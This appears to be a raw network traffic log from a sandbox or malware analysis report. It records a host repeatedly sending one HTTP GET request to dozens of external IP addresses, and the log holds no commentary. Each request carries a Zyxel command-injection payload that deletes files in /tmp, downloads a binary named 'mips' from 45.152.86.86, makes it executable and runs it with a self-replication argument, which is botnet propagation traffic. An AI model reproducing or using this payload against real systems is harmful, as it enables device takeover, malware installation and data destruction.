                                        Mar 31, 2024 09:22:19.600208998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7826192.168.2.233925096.208.153.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.600279093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7827192.168.2.2359956155.225.145.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.600341082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7828192.168.2.2347078200.182.57.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.600394011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7829192.168.2.2354100115.107.25.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.609348059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7830192.168.2.2346672129.217.205.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610433102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7831192.168.2.2355226162.224.103.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610522985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7832192.168.2.2336158110.18.202.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610567093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7833192.168.2.23577264.222.101.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610637903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7834192.168.2.2351372107.125.224.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610699892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7835192.168.2.234927250.233.146.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610781908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7836192.168.2.233564665.197.66.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610838890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7837192.168.2.233710443.223.67.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610933065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7838192.168.2.235296848.91.148.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.610990047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7839192.168.2.235180857.195.124.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.611063957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7840192.168.2.2334864151.37.179.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.611134052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7841192.168.2.2336750117.195.118.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.611187935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7842192.168.2.2345436144.58.52.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.611272097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7843192.168.2.2358088146.202.65.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.611315966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7844192.168.2.2333630197.16.220.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:20.588270903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7845192.168.2.235794287.162.134.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:21.622159004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7846192.168.2.2334814163.204.12.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:21.622225046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7847192.168.2.2357754207.105.40.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:22.627437115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7848192.168.2.2358942204.145.142.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:22.627564907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7849192.168.2.2347830153.66.191.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:22.627609968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7850192.168.2.2339048163.174.76.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:23.632780075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7851192.168.2.2355258120.180.78.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:23.632850885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7852192.168.2.2343080167.70.51.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:23.632910967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7853192.168.2.2355556118.178.55.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:23.632965088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7854192.168.2.2332994198.60.126.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648335934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7855192.168.2.233818095.210.66.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648386002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7856192.168.2.2345424143.129.194.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648463011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7857192.168.2.2355410144.218.202.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648498058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7858192.168.2.234550099.200.43.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648561001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7859192.168.2.2340742167.191.223.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648627043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7860192.168.2.23497584.162.43.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648689032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7861192.168.2.2353370152.79.131.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648761034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7862192.168.2.2338272191.251.229.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648787022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7863192.168.2.233775242.77.245.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648858070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7864192.168.2.234397294.182.110.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648910999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7865192.168.2.2341566102.51.158.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.648972988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7866192.168.2.2338440216.139.97.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649044991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7867192.168.2.233434887.160.50.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649111986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7868192.168.2.234868418.54.201.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649183989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7869192.168.2.23374728.198.140.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649241924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7870192.168.2.233751645.119.8.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649306059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7871192.168.2.233940444.208.76.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649358988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7872192.168.2.2351494105.164.44.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649410009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7873192.168.2.235562042.250.146.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649466038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7874192.168.2.234932673.20.106.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649533987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7875192.168.2.2356314188.8.105.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649569035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7876192.168.2.235113484.105.55.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649627924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7877192.168.2.234500853.206.213.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649698019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7878192.168.2.2333280119.220.47.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649764061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7879192.168.2.233335082.224.122.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649816036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7880192.168.2.233667691.71.83.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649876118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7881192.168.2.2346900217.43.13.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649934053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7882192.168.2.2353192151.20.227.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.649996996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7883192.168.2.235491280.229.37.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650057077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7884192.168.2.234022424.48.230.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650125980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7885192.168.2.234018034.186.128.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650190115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7886192.168.2.233743665.150.107.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650269985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7887192.168.2.2352202131.107.170.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650310993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7888192.168.2.234740093.237.218.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650382996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7889192.168.2.2336438179.174.107.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650453091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7890192.168.2.2350438174.55.69.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650496960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7891192.168.2.23469945.201.24.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650558949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7892192.168.2.2360000138.172.221.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.650638103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7893192.168.2.2359508123.167.52.55443
                                        TimestampBytes transferredDirectionData
